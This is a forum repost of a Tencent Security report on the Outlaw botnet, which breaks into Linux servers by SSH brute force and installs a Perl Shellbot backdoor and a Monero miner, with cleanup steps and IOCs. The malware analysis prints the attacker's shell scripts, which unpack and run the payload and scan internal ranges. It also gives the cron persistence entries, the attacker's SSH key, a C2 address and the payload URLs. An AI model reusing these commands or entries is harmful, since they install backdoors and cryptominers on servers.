跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

亡命徒(Outlaw)僵尸网络感染约2万台Linux服务器,腾讯安全提醒企业及时清除


HACK1949

推荐的帖子

感谢腾讯御见威胁情报中心来稿!

原文链接:https://mp.weixin.qq.com/s/4_E6kPuodxb3_inVCq2fqg

 

一、背景

腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。亡命徒(Outlaw)僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸网络已造成国内约2万台Linux服务器感染,影响上万家企业。

此次攻击传播的母体文件为dota3.tar.gz,可能为亡命徒(Outlaw)僵尸网络的第3个版本,母体文件释放shell脚本启动对应二进制程序,kswapd0负责进行门罗币挖矿,tsm32、tsm64负责继续SSH爆破攻击传播病毒。

亡命徒(Outlaw)僵尸网络之前通过利用Shellshock漏洞进行分发,因此被命名为“ Shellbot”。Shellbot利用物联网(IoT)设备和Linux服务器上的常见命令注入漏洞进行感染。Shellshock漏洞(CVE-2014-7169)是2014年在Bash command shell中发现的一个严重的漏洞,大多数Linux发行版通常会使用到该功能,攻击者可以在这些受影响的Linux服务器上远程执行代码。

亡命徒(Outlaw)僵尸网络利用SSH爆破入侵的攻击活动,可以被腾讯T-Sec高级威胁检测系统(御界)检测到:

dff47d25cc4e16b239a2586a4e8864df.jpg

腾讯T-Sec云防火墙可以检测亡命徒(Outlaw)僵尸网络的挖矿行为、Shellshock漏洞利用及暴力破解SSH登录口令等等攻击活动。

目前,Outlaw僵尸网络的影响仍在扩散,对企业服务器危害严重,腾讯安全系列产品已采取应急响应措施,执行清单如下:

应用

场景

安全产品 解决方案

腾讯T-Sec

威胁情报云查服务

(SaaS)

1)亡命徒(Outlaw)僵尸网络相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1)亡命徒(Outlaw)僵尸网络相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

(Cloud Firewall,CFW)

基于网络流量进行威胁检测与主动拦截,已支持:

1)亡命徒(Outlaw)僵尸网络相关联的IOCs已支持识别检测;

2)云防火墙已支持对亡命徒(Outlaw)僵尸网络所采用挖矿协议的检测拦截、Shellshock漏洞利用检测以及采取SSH暴力破解的检测。

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

(Cloud Workload Protection,CWP)

1)云镜已支持检测云主机是否存在SSH弱口令,检测外部针对云主机的SSH弱口令爆破行为;

2)已支持查杀亡命徒(Outlaw)僵尸网络相关的挖矿木马、后门程序。

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 漏洞扫描服务

(Vulnerability Scan Service,VSS)

1)腾讯漏洞扫描服务已支持监测全网资产是否存在SSH弱口令。

2)腾讯漏洞扫描服务已支持检测全网资产是否受Shellshock漏洞CVE-2014-7169(UCS Manager相关)影响。

 

关于腾讯T-Sec漏洞扫描服务的更多信息,可参考:https://cloud.tencent.com/product/vss

腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护 腾讯T-Sec

高级威胁检测系统

(腾讯御界)

基于网络流量进行威胁检测,已支持:

1)御界已支持通过协议特征检测亡命徒(Outlaw)僵尸网络的挖矿行为;

2)御界已支持检测SSH弱口令爆破攻击行为;

3)腾讯御界已支持检测Shellshock漏洞CVE-2014-7169、CVE-2014-6271。

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

腾讯T-Sec终端安全管理系统(御点) 1)可查杀亡命徒(Outlaw)僵尸网络释放的后门木马、挖矿木马程序;

腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html

更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/

二、样本分析

Outlaw通过SSH爆破攻击,访问目标系统并下载带有shell脚本、挖矿木马、后门木马的TAR压缩包文件dota3.tar.gz。解压后的文件目录可以看到,根目录rsync下存放初始化脚本,a目录下存放shellbot后门,b目录下存放挖矿木马,c目录下存放SSH爆破攻击程序。

247f01de20ac17bcffc6cb1b09e1fe03.png

C目录下二进制文件tsm32、tsm64为SSH(22端口)扫描和爆破程序,并可以通过执行远程命名来下载和执行恶意程序。

1bb95457b31b87d2bbbae3a797587117.png

 

爆破成功后执行base64编码的shell命令,主要功能为删除旧版本的恶意程序和目录,然后解压获取到的最新版本恶意程序并执行,内容如下:

命令1

#!/bin/bash

cd /tmp

rm -rf .ssh

rm -rf .mountfs

rm -rf .X13-unix

rm -rf .X17-unix

rm -rf .X19-unix

rm -rf .X2*

mkdir .X25-unix

cd .X25-unix

mv ar/tmp/dota3.tar.gz dota3.tar.gz

tar xf dota3.tar.gz

sleep 3s && cd .rsync; cat /tmp/.X25-unix/.rsync/initall | bash 2>1&

sleep 45s && pkill -9 run && pkill -9 go && pkill -9 tsm

exit 0

命令2

#!/bin/bash

cd /tmp

rm -rf .ssh

rm -rf .mountfs

rm -rf .X13-unix

rm -rf .X17-unix

rm -rf .X19-unix

rm -rf .X2*

mkdir .X25-unix

cd .X25-unix

mv ar/tmp/dota3.tar.gz dota3.tar.gz

tar xf dota3.tar.gz

sleep 3s && cd /tmp/.X25-unix/.rsync/c

nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&

sleep 8m && nohup /tmp/.X25-unix/.rsync/cm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&

sleep 20m && cd ..; /tmp/.X25-unix/.rsync/initall 2>1&

exit 0

ffd21fa81c261dea77c4c70203eaca77.png

还会通过远程命令修改SSH公钥为:

AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw==

以便之后能更容易入侵。

988c17dc24bf511cacb72673e735dcb7.png

B目录下run脚本主要内容为base64编码的shellbot后门程序,解码后可以看到代码仍然经过混淆。

d0122e81ddc874384cb44e9eb5e244cb.png

把执行函数eval改为print可打印出解密后的代码,是基于Perl的Shellbot变种,连接C2服务器地址为45.9.148.99:443,能够执行多个后门命令,包括文件下载、执行shell cmd和DDoS攻击。如果接受到扫描端口命令,可针对以下端口进行扫描:”21″,”22″,”23″,”25″,”53″,”80″,”110″,”143″,”6665″。

10fc8a4da68736d2435836b34a6278ee.png
2bf2d3cc2ac7ee07b546278da95a90e5.png

A目录下二进制文件kswapd0为XMRig编译的Linux平台门罗币挖矿木马。

81468f84e01ca00aed814a4c23c0b214.png

在初始化阶段会执行脚本init0来找到大量Linux平台竞品挖矿木马并进行清除。

734d75f405011c9795dee6778c0aa6e4.png

在当前用户目录下创建/.configrc目录,拷贝a、b文件夹到该目录下并执行初始化脚本,然后通过写入cron.d安装计划任务进行持久化。写入定时任务如下:

1 1 */2 * * $dir2/a/upd>/dev/null 2>&1
@reboot $dir2/a/upd>/dev/null 2>&1
5 8 * * 0 $dir2/b/sync>/dev/null 2>&1
@reboot $dir2/b/sync>/dev/null 2>&1
0 0 */3 * * $dir/c/aptitude>/dev/null 2>&1

0f4f60af4a868a8200dd9de13b6e03d5.png

三、安全建议

建议企业Linux服务器管理员检查服务器资源占用情况,及时修改弱密码,避免被暴力破解。若发现服务器已被入侵安装挖矿木马,可参考以下步骤手动检查、清除:

1、 删除以下文件,杀死对应进程:

/tmp/*-unix/.rsync/a/kswapd0

*/.configrc/a/kswapd0

md5: 84945e9ea1950be3e870b798bd7c7559

/tmp/*-unix/.rsync/c/tsm64

md5: 4adb78770e06f8b257f77f555bf28065

/tmp/*-unix/.rsync/c/tsm32

md5: 10ea65f54f719bffcc0ae2cde450cb7a

2、 检查cron.d中是否存在包含以下内容的定时任务,如有进行删除:

/a/upd

/b/sync

/c/aptitude

IOCs

IP

45.9.148.99

45.55.57.6

188.166.58.29

104.236.228.46

165.227.45.249

192.241.211.94

188.166.6.130

142.93.34.237

46.101.33.198

149.202.162.73

167.71.155.236

157.245.83.8

45.55.129.23

46.101.113.206

37.139.0.226

159.203.69.48

104.131.189.116

159.203.102.122

159.203.17.176

91.121.51.120

128.199.178.188

208.68.39.124

45.55.210.248

206.81.10.104

5.230.65.21

138.197.230.249

107.170.204.148

Md5

dota3.tar.gz 1a4592f48f8d1bf77895862e877181e0
kswapd0 84945e9ea1950be3e870b798bd7c7559
tsm64 4adb78770e06f8b257f77f555bf28065
tsm32 10ea65f54f719bffcc0ae2cde450cb7a
run 716e6b533f836cee5e480a413a84645a

URL

http[:]//45.55.57.6/dota3.tar.gz

http[:]//188.166.58.29/dota3.tar.gz

http[:]//104.236.228.46/dota3.tar.gz

http[:]//165.227.45.249/dota3.tar.gz

http[:]//192.241.211.94/dota3.tar.gz

http[:]//188.166.6.130/dota3.tar.gz

http[:]//142.93.34.237/dota3.tar.gz

http[:]//46.101.33.198/dota3.tar.gz

http[:]//149.202.162.73/dota3.tar.gz

http[:]//167.71.155.236/dota3.tar.gz

http[:]//157.245.83.8/dota3.tar.gz

http[:]//45.55.129.23/dota3.tar.gz

http[:]//46.101.113.206/dota3.tar.gz

http[:]//37.139.0.226/dota3.tar.gz

http[:]//159.203.69.48/dota3.tar.gz

http[:]//104.131.189.116/dota3.tar.gz

http[:]//159.203.102.122/dota3.tar.gz

http[:]//159.203.17.176/dota3.tar.gz

http[:]//91.121.51.120/dota3.tar.gz

http[:]//128.199.178.188/dota3.tar.gz

http[:]//208.68.39.124/dota3.tar.gz

http[:]//45.55.210.248/dota3.tar.gz

http[:]//206.81.10.104/dota3.tar.gz

http[:]//5.230.65.21/dota3.tar.gz

http[:]//138.197.230.249/dota3.tar.gz

http[:]//107.170.204.148/dota3.tar.gz

 

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...